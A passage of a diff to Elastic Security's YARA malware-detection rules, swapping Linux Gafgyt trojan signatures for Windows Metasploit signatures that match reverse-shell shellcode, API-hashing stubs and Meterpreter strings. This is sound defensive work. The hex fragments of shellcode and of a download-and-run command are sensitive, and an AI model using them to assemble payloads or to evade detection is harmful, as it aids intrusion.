"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "fb4e3e54618075d5ef6ec98d1ba9c332ce9f677f0879e07b34a2ca08b2180dd9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a" + fingerprint = "21855599bc51ec2f71d694d4e0f866f815efe54a42842dfe5f8857811530a686" + threat_name = "Windows.Trojan.Metasploit" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 E8 0F B6 00 84 C0 74 17 48 8B 75 E8 48 FF C6 48 8B 7D F0 48 } + $a1 = { 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 } condition: - all of them + $a1 } -rule ELASTIC_Linux_Trojan_Gafgyt_821173Df : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_38B8Ceec : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)." author = "Elastic Security" - id = "821173df-6835-41e1-a662-a432abf23431" - date = "2021-01-12" - modified = "2021-09-16" + id = "38b8ceec-601c-4117-b7a0-74720e26bf38" + date = "2021-03-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L336-L354" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "de7d1aff222c7d474e1a42b2368885ef16317e8da1ca3a63009bf06376026163" - logic_hash = "1c6c7666983c43176aa1a9628fb4352f8f11729e02dda13669ca2e62aed5f4ee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8e3bc02661cedb9885467373f8120542bb7fc8b0944803bc01642fbc8426298b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c311789e1370227f7be1d87da0c370a905b7f5b4c55cdee0f0474060cc0fc5e4" - severity = 100 + fingerprint = "44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342" + threat_name = "Windows.Trojan.Metasploit" + severity = 85 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D0 48 FF C8 48 03 45 F8 48 FF C8 C6 00 00 48 8B 45 F8 48 C7 C1 FF FF } + $a1 = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61 } condition: - all of them + $a1 } -rule ELASTIC_Linux_Trojan_Gafgyt_31796A40 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_7Bc0F998 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies the API address lookup function leverage by metasploit shellcode" author = "Elastic Security" - id = "31796a40-1cbe-4d0c-a785-d16f40765f4a" - date = "2021-01-12" - modified = "2021-09-16" + id = "7bc0f998-7014-4883-8a56-d5ee00c15aed" + date = "2021-03-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L356-L374" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb" - logic_hash = "0e0e901d12edd77e77a205f8547f891f483fc8676493e9b7a324e970225af3c9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "29cb48086dbcd48bd83c5042ed78370e127e1ea5170ee7383b88659b31e896b5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae" - severity = 100 + fingerprint = "fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835" + threat_name = "Windows.Trojan.Metasploit" + severity = 84 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 14 48 63 D0 48 8D 45 C0 48 8D 70 04 48 8B 45 E8 48 8B 40 18 48 } + $a1 = { 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61 } condition: - all of them + $a1 } -rule ELASTIC_Linux_Trojan_Gafgyt_750Fe002 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_F7F826B4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies metasploit kernel->user shellcode. Likely used in ETERNALBLUE and BlueKeep exploits." author = "Elastic Security" - id = "750fe002-cac1-4832-94d2-212aa5ec17e3" - date = "2021-01-12" - modified = "2021-09-16" + id = "f7f826b4-6456-4819-bc0c-993aeeb7e325" + date = "2021-03-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L376-L394" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" - logic_hash = "eb9907d8a63822c2e3ab57d43dca8ede7876610f029e2f9c10c9eeace9ea0078" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2f5264e07c65d5ef4efe49a48c24ccef9a4b9379db581d2cf18e1131982e6f2f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f51347158a6477b0da4ed4df3374fbad92b6ac137aa4775f83035d1e30cba7dc" + fingerprint = "9b07dc54d5015d0f0d84064c5a989f94238609c8167cae7caca8665930a20f81" + threat_name = "Windows.Trojan.Metasploit" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 10 8B 45 0C 40 8A 00 3C FC 75 06 C6 45 FF FE EB 50 8B 45 0C 40 } + $a1 = { 48 92 31 C9 51 51 49 89 C9 4C 8D 05 0? 00 00 00 89 CA 48 83 EC 20 FF D0 48 83 C4 30 C3 } condition: - all of them + $a1 } -rule ELASTIC_Linux_Trojan_Gafgyt_6122Acdf : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_24338919 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)." author = "Elastic Security" - id = "6122acdf-1eef-45ea-83ea-699d21c2dc20" - date = "2021-01-12" - modified = "2021-09-16" + id = "24338919-8efe-4cf2-a23a-a3f22095b42d" + date = "2021-03-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L396-L413" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "140b32a8f2b7493b068e63a05b3d9baec6ec14c9f2062c7e760dde96335e29f1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "af8cceebdebca863019860afca5d7c6400b68c8450bc17b7d7b74aeab2d62d16" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "283275705c729be23d7dc75056388ecae00390bd25ee7b66b0cfc9b85feee212" - severity = 100 + fingerprint = "ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804" + threat_name = "Windows.Trojan.Metasploit" + severity = 80 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 B0 00 FC 8B 7D E8 F2 AE 89 C8 F7 D0 48 48 89 45 F8 EB 03 FF } + $a1 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 } condition: - all of them + $a1 } -rule ELASTIC_Linux_Trojan_Gafgyt_A0A4De11 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_0F5A852D : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families." author = "Elastic Security" - id = "a0a4de11-fe65-449f-a990-ad5f18ac66f0" - date = "2021-01-12" - modified = "2021-09-16" + id = "0f5a852d-cacd-43d7-8754-204b09afba2f" + date = "2021-04-07" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L415-L433" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417" - logic_hash = "220c6ba82b906f070123b3bae9aafa72c0fb3bc8d5858a4f4bd65567076eb73d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "11cddf2191a2f70222a0c8c591e387b4b5667bc432a2f686629def9252361c1d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047" - severity = 100 + fingerprint = "97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d" + threat_name = "Windows.Trojan.Metasploit" + severity = 80 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 42 0D 83 C8 10 88 42 0D 48 8B 55 D8 0F B6 42 0D 83 C8 08 88 } + $a = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_A473Dcb6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_C9773203 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families." author = "Elastic Security" - id = "a473dcb6-887e-4a9a-a1f2-df094f1575b9" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L435-L453" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7ba74e3cb0d633de0e8dbe6cfc49d4fc77dd0c02a5f1867cc4a1f1d575def97d" - logic_hash = "106ee9cd9c368674ae08b835f54dbb6918b553e3097aae9b0de88f55420f046b" + id = "c9773203-6d1e-4246-a1e0-314217e0207a" + date = "2021-04-07" + modified = "2021-08-23" + reference = "https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L121-L140" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1d6503ccf05b8e8b4368ed0fb2e57aa2be94151ce7e2445b5face7b226a118e9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6119a43aa5c9f61249083290293f15696b54b012cdf92553fd49736d40c433f9" - severity = 100 + fingerprint = "afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36" + threat_name = "Windows.Trojan.Metasploit" + severity = 10 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 49 56 04 0B 1E 46 1E B0 EB 10 18 38 38 D7 80 4D 2D 03 29 62 } + $a = { 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_30444846 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_Dd5Ce989 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies Meterpreter DLL used by Metasploit" author = "Elastic Security" - id = "30444846-439f-41e1-b0b4-c12da774a228" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L455-L473" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c84b81d79d437bb9b8a6bad3646aef646f2a8e1f1554501139648d2f9de561da" - logic_hash = "26bc95efb2ea69fece52cf3ab38ce35891c77fc0dac3e26e5580ba3a88e112e9" + id = "dd5ce989-3925-4e27-97c1-3b8927c557e9" + date = "2021-04-14" + modified = "2021-08-23" + reference = "https://www.rapid7.com/blog/post/2015/03/25/stageless-meterpreter-payloads/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L142-L164" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "86cf98bf854b01a55e3f306597437900e11d429ac6b7781e090eeda3a5acb360" + logic_hash = "5c094979be1cd347ffee944816b819b6fbb62804b183a6120cd3a93d2759155b" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3c74db508de7c8c1c190d5569e0a2c2b806f72045e7b74d44bfbaed20ecb956b" - severity = 100 + fingerprint = "4fc7c309dca197f4626d6dba8afcd576e520dbe2a2dd6f7d38d7ba33ee371d55" + threat_name = "Windows.Trojan.Metasploit" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 64 20 2B 78 20 74 66 74 70 31 2E 73 68 3B 20 73 68 20 74 66 74 } + $a1 = "metsrv.x64.dll" fullword + $a2 = "metsrv.dll" fullword + $b1 = "ReflectiveLoader" condition: - all of them + 1 of ($a*) and 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Gafgyt_Ea92Cca8 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_96233B6B : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies another 64 bit API hashing function used by Metasploit." author = "Elastic Security" - id = "ea92cca8-bba7-4a1c-9b88-a2d051ad0021" - date = "2021-01-12" - modified = "2021-09-16" + id = "96233b6b-d95a-4e0e-8f83-f2282a342087" + date = "2021-06-10" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L475-L492" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "5a9598b3fd37b15444063403a481df1a43894ddcbbd343961e1c770cb74180c9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L166-L185" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e7a2d966deea3a2df6ce1aeafa8c2caa753824215a8368e0a96b394fb46b753b" + logic_hash = "09a2b9414a126367df65322966b671fe7ea963cd65ef48e316c9d139ee502d31" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e" + fingerprint = "40032849674714bc9eb020971dd9f27a07b53b8ff953b793cb3aad136256fd70" + threat_name = "Windows.Trojan.Metasploit" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64 } + $a = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 31 FF 0F B7 4A 26 31 C0 AC 3C 61 7C 02 2C 20 C1 CF 0D } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_D4227Dbf : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_4A1C4Da8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Identifies Metasploit 64 bit reverse tcp shellcode." author = "Elastic Security" - id = "d4227dbf-6ab4-4637-a6ba-0e604acaafb4" - date = "2021-01-12" - modified = "2021-09-16" + id = "4a1c4da8-837d-4ad1-a672-ddb8ba074936" + date = "2021-06-10" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L494-L512" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" - logic_hash = "7953b8d08834315a6ca2c0c8ac1ec7b74a6ffcb71cec4fc053c24e1b59232c0c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L187-L206" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22" + logic_hash = "9d3a3164ed1019dcb557cf20734a81be9964a555ddb2e0104f7202880b2ed177" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3" + fingerprint = "7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987" + threat_name = "Windows.Trojan.Metasploit" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 } + $a = { 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_09C3070E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_91Bc5D7D : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "09c3070e-4b71-45a0-aa62-0cc6e496644a" - date = "2021-01-12" - modified = "2021-09-16" + id = "91bc5d7d-31e3-4c02-82b3-a685194981f3" + date = "2021-08-02" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L514-L532" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" - logic_hash = "f8f8e8883cf1e51fbaef81b8334ac5fa45a54682d285282da62c80e4aa50a48d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L208-L226" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987" + logic_hash = "74154902b03c36a4ee9bc54ae9399bae9e6afb7fe8d0fe232b88250afc368d6f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d" + fingerprint = "8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 48 C1 E8 06 48 89 C6 48 8B 94 C5 50 FF FF FF 8B 8D 2C FF FF FF 83 } + $a = { 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Fa19B8Fc : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_A91A6571 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "fa19b8fc-6035-4415-842f-4993411ab43e" - date = "2021-01-12" - modified = "2021-09-16" + id = "a91a6571-ae2d-4ab4-878b-38b455f42c01" + date = "2022-06-08" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L534-L552" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a7cfc16ec33ec633cbdcbff3c4cefeed84d7cbe9ca1f4e2a3b3e43d39291cd6b" - logic_hash = "cddf3b9948b9bc685ff7d4c00377d0f80861169707777022297e549bd166dbf0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L228-L246" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ff7795edff95a45b15b03d698cbdf70c19bc452daf4e2d5e86b2bbac55494472" + logic_hash = "cc59320ba9f8907d1d9b9dc120d8b4807b419e49c55be1fd5d2cdbb0c5d4e5cc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4f213d5d1b4a0b832ed7a6fac91bef7c29117259b775b85409e9e4c8aec2ad10" + fingerprint = "e372484956eab80e4bf58f4ae1031de705cb52eaefa463aa77af7085c463638d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 02 63 10 01 0F 4B 85 14 36 B0 60 53 03 4F 0D B2 05 76 02 B7 00 00 } + $a = { FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 31 D2 51 56 65 48 8B 52 60 48 8B 52 18 48 8B 52 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Eaa9A668 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_B29Fe355 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "eaa9a668-e3b9-4657-81bf-1c6456e2053a" - date = "2021-01-12" - modified = "2021-09-16" + id = "b29fe355-b7f8-4325-bf06-7975585f3888" + date = "2022-06-08" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L554-L572" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "409c55110d392aed1a9ec98a6598fb8da86ab415534c8754aa48e3949e7c4b62" - logic_hash = "05e9047342a9d081a09f8514f0ec32d72bc43a286035014ada90b0243f92cfa8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L248-L268" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4f0ab4e42e6c10bc9e4a699d8d8819b04c17ed1917047f770dc6980a0a378a68" + logic_hash = "7a2189b59175acb66a7497c692a43c413a476f5c4371f797bf03a8ddb550992c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bee2744457164e5747575a101026c7862474154d82f52151ac0d77fb278d9405" + fingerprint = "a943325b7a227577ccd45748b4e705288c5b7d91d0e0b2a115daeea40e1a2148" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 C0 0F B6 00 3C 2F 76 0B 48 8B 45 C0 0F B6 00 3C 39 76 C7 48 8B } + $a1 = "%04x-%04x:%s" fullword + $a2 = "\\\\%s\\pipe\\%s" fullword + $a3 = "PACKET TRANSMIT" fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_46Eec778 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Metasploit_66140F58 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Metasploit (Windows.Trojan.Metasploit)" author = "Elastic Security" - id = "46eec778-7342-4ef7-adac-35bc0cdb9867" - date = "2021-01-12" - modified = "2021-09-16" + id = "66140f58-1815-4e21-8544-24fed74194f1" + date = "2022-08-15" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L574-L592" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1" - logic_hash = "08e77a31005e14a06197857301e22d20334c1f2ef7fc06a4208643438377f4c4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Metasploit.yar#L270-L288" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01a0c5630fbbfc7043d21a789440fa9dadc6e4f79640b370f1a21c6ebf6a710a" + logic_hash = "0a855b7296f7cea39cc5d57b239d3906133ea43a0811ec60e4d91765cf89aced" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518" + fingerprint = "79879b2730e98f3eddeca838dff438d75a43ac20c0da6a4802474ff05f9cc7a3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C0 01 45 F8 48 83 45 E8 02 83 6D C8 02 83 7D C8 01 7F E4 83 7D } + $a = { FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 